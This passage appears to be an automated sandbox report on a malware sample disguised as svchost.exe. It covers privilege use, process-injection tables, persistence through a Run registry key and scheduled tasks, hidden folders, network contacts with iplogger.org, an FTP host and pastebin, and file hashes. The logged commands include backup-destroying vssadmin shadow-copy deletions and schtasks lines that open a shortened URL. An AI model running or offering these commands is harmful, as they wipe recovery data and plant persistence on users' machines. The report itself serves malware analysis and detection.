N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3084 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2824 wrote to memory of 4716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 3084 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3084 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3084 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 888 wrote to memory of 3540 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 888 wrote to memory of 3540 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3128 wrote to memory of 4088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3128 wrote to memory of 4088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2520 wrote to memory of 1056 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2520 wrote to memory of 1056 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1308 wrote to memory of 4456 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1308 wrote to memory of 4456 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3804 wrote to memory of 1832 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3804 wrote to memory of 1832 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 532 wrote to memory of 2988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 532 wrote to memory of 2988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1484 wrote to memory of 2964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1484 wrote to memory of 2964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2504 wrote to memory of 3044 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2504 wrote to memory of 3044 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1652 wrote to memory of 4320 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1652 wrote to memory of 4320 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3776 wrote to memory of 2020 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3776 wrote to memory of 2020 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2464 wrote to memory of 2228 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2464 wrote to memory of 2228 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 752 wrote to memory of 2896 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 752 wrote to memory of 2896 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4284 wrote to memory of 1868 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4284 wrote to memory of 1868 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3084 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3084 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3084 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3084 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe

System policy modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:59" /sc daily /mo "1" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "08:33" /sc daily /mo "3" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "10:17" /sc daily /mo "5" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "10:36" /sc weekly /mo "2" /d "Sat" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "03:18" /sc monthly /m "may" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 89.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 64.40.144.30:33039 ftp.encompossoftware.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 www.example.com udp
US 172.67.19.24:443 pastebin.com tcp
US 147.185.221.16:59320 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 93.184.215.14:443 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 74.90.14.23.in-addr.arpa udp
US 147.185.221.16:59320 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bno0zii0.ro2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 05e991bcf019b487f7ad4e896c77e988
SHA1 f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
SHA256 cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
SHA512 4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 f6d83cb3ec0cf035c26b86a8009ab714
SHA1 9c2d16be04908f2d28ce66b41ca4487b618534b3
SHA256 2abe8a8f5bc11a760fed80a31be099fc4ffe88cf786ccec2d6b0610877910212
SHA512 9f94dfc2f18ab2130698724a6a6e54c3ddb4f7695b60e71eaee9b2ed0ca09fdc30830bf70de450814260c771674988999b8b94bf78dec6cbb068c8bd073b1696
